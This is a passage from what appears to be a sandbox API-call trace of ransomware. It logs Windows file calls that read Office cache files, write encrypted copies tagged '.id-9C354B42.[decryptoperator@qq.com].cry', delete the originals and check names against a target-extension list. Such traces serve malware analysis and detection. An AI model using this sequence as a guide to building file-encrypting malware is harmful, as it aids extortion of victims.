| out: lpNewFilePointer=0x0) returned 1 [0046.534] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0046.534] GetLastError () returned 0x0 [0046.534] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xa0200, lpOverlapped=0x0) returned 1 [0046.641] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xa0210, lpOverlapped=0x0) returned 1 [0046.651] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.651] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.652] SetEndOfFile (hFile=0x16c) returned 1 [0046.652] CloseHandle (hObject=0x16c) returned 1 [0046.652] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.652] SetEndOfFile (hFile=0x184) returned 1 [0046.657] CloseHandle (hObject=0x184) returned 1 [0046.657] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0046.657] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.657] lstrlenW (lpString=".doc") returned 4 [0046.657] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.657] lstrlenW (lpString=".docx") returned 5 [0046.657] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.657] lstrlenW (lpString=".pdf") returned 4 [0046.657] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.657] lstrlenW (lpString=".xls") returned 4 [0046.657] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.657] lstrlenW (lpString=".xlsx") returned 5 [0046.657] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.657] lstrlenW (lpString=".ppt") returned 4 [0046.658] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.658] lstrlenW (lpString=".zip") returned 4 [0046.658] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString=".rar") returned 4 [0046.658] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString=".bz2") returned 4 [0046.658] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.658] lstrlenW (lpString=".7z") returned 3 [0046.658] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.658] lstrlenW (lpString=".dbf") returned 4 [0046.658] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.658] lstrlenW (lpString=".1cd") returned 4 [0046.658] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.658] lstrlenW (lpString=".jpg") returned 4 [0046.658] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.658] lstrlenW (lpString=".doc") returned 4 [0046.658] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString=".docx") returned 5 [0046.658] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.658] lstrlenW (lpString=".pdf") returned 4 [0046.658] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString=".xls") returned 4 [0046.658] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.658] lstrlenW (lpString=".xlsx") returned 5 [0046.659] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.659] lstrlenW (lpString=".ppt") returned 4 [0046.659] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.659] lstrlenW (lpString=".zip") returned 4 [0046.659] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.659] lstrlenW (lpString=".rar") returned 4 [0046.659] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.659] lstrlenW (lpString=".bz2") returned 4 [0046.659] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.659] lstrlenW (lpString=".7z") returned 3 [0046.659] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.659] lstrlenW (lpString=".dbf") returned 4 [0046.659] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.659] lstrlenW (lpString=".1cd") returned 4 [0046.659] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0046.659] lstrlenW (lpString=".jpg") returned 4 [0046.659] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.659] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0046.659] lstrlenW (lpString="OfficeMUISet.msi") returned 16 [0046.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.659] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=868864) returned 1 [0046.660] CloseHandle (hObject=0x184) returned 1 [0046.660] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020 [0046.660] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0046.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.660] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.660] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0046.660] GetLastError () returned 0x0 [0046.660] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0047.027] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0047.052] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.052] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0047.052] SetEndOfFile (hFile=0x16c) returned 1 [0047.052] CloseHandle (hObject=0x16c) returned 1 [0047.052] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.053] SetEndOfFile (hFile=0x184) returned 1 [0047.192] CloseHandle (hObject=0x184) returned 1 [0047.192] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.193] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0047.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.193] lstrlenW (lpString=".doc") returned 4 [0047.193] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.193] lstrlenW (lpString=".docx") returned 5 [0047.193] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.193] lstrlenW (lpString=".pdf") returned 4 [0047.193] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.193] lstrlenW (lpString=".xls") returned 4 [0047.193] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.193] lstrlenW (lpString=".xlsx") returned 5 [0047.193] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.193] lstrlenW (lpString=".ppt") returned 4 [0047.193] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.193] lstrlenW (lpString=".zip") returned 4 [0047.193] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.193] lstrlenW (lpString=".rar") returned 4 [0047.193] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.193] lstrlenW (lpString=".bz2") returned 4 [0047.193] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.193] lstrlenW (lpString=".7z") returned 3 [0047.193] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.193] lstrlenW (lpString=".dbf") returned 4 [0047.193] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.193] lstrlenW (lpString=".1cd") returned 4 [0047.193] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.193] lstrlenW (lpString=".jpg") returned 4 [0047.193] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.194] lstrlenW (lpString=".doc") returned 4 [0047.194] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.194] lstrlenW (lpString=".docx") returned 5 [0047.194] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.194] lstrlenW (lpString=".pdf") returned 4 [0047.194] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.194] lstrlenW (lpString=".xls") returned 4 [0047.194] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.194] lstrlenW (lpString=".xlsx") returned 5 [0047.194] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.194] lstrlenW (lpString=".ppt") returned 4 [0047.194] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.194] lstrlenW (lpString=".zip") returned 4 [0047.194] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.194] lstrlenW (lpString=".rar") returned 4 [0047.194] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.194] lstrlenW (lpString=".bz2") returned 4 [0047.194] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.194] lstrlenW (lpString=".7z") returned 3 [0047.194] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.194] lstrlenW (lpString=".dbf") returned 4 [0047.194] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.194] lstrlenW (lpString=".1cd") returned 4 [0047.194] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.194] lstrlenW (lpString=".jpg") returned 4 [0047.194] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.194] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0047.194] lstrlenW (lpString="AccLR.cab") returned 9 [0047.194] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.208] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=28016276) returned 1 [0047.208] CloseHandle (hObject=0x190) returned 1 [0047.208] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020 [0047.208] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.208] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0047.208] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.208] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.208] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.209] ReadFile (in: hFile=0x190, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.234] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.234] ReadFile (in: hFile=0x190, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.331] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.331] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.331] ReadFile (in: hFile=0x190, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.565] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.565] WriteFile (in: hFile=0x190, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0047.585] SetEndOfFile (hFile=0x190) returned 1 [0047.586] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0047.831] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.831] WriteFile (in: hFile=0x190, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.832] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.832] WriteFile (in: hFile=0x190, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.835] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.835] WriteFile (in: hFile=0x190, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0048.038] CloseHandle (hObject=0x190) returned 1 [0048.038] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.038] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.038] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.038] lstrlenW (lpString=".doc") returned 4 [0048.038] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.038] lstrlenW (lpString=".docx") returned 5 [0048.038] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0048.038] lstrlenW (lpString=".pdf") returned 4 [0048.038] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".xls") returned 4 [0048.039] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".xlsx") returned 5 [0048.039] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0048.039] lstrlenW (lpString=".ppt") returned 4 [0048.039] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.039] lstrlenW (lpString=".zip") returned 4 [0048.039] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".rar") returned 4 [0048.039] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".bz2") returned 4 [0048.039] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.039] lstrlenW (lpString=".7z") returned 3 [0048.039] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.039] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.039] lstrlenW (lpString=".dbf") returned 4 [0048.039] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.039] lstrlenW (lpString=".1cd") returned 4 [0048.039] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.039] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.039] lstrlenW (lpString=".jpg") returned 4 [0048.039] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.039] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.039] lstrlenW (lpString=".doc") returned 4 [0048.039] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".docx") returned 5 [0048.039] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0048.039] lstrlenW (lpString=".pdf") returned 4 [0048.039] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".xls") returned 4 [0048.039] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.039] lstrlenW (lpString=".xlsx") returned 5 [0048.040] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0048.040] lstrlenW (lpString=".ppt") returned 4 [0048.040] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.040] lstrlenW (lpString=".zip") returned 4 [0048.040] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.040] lstrlenW (lpString=".rar") returned 4 [0048.040] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.040] lstrlenW (lpString=".bz2") returned 4 [0048.040] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.040] lstrlenW (lpString=".7z") returned 3 [0048.040] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.040] lstrlenW 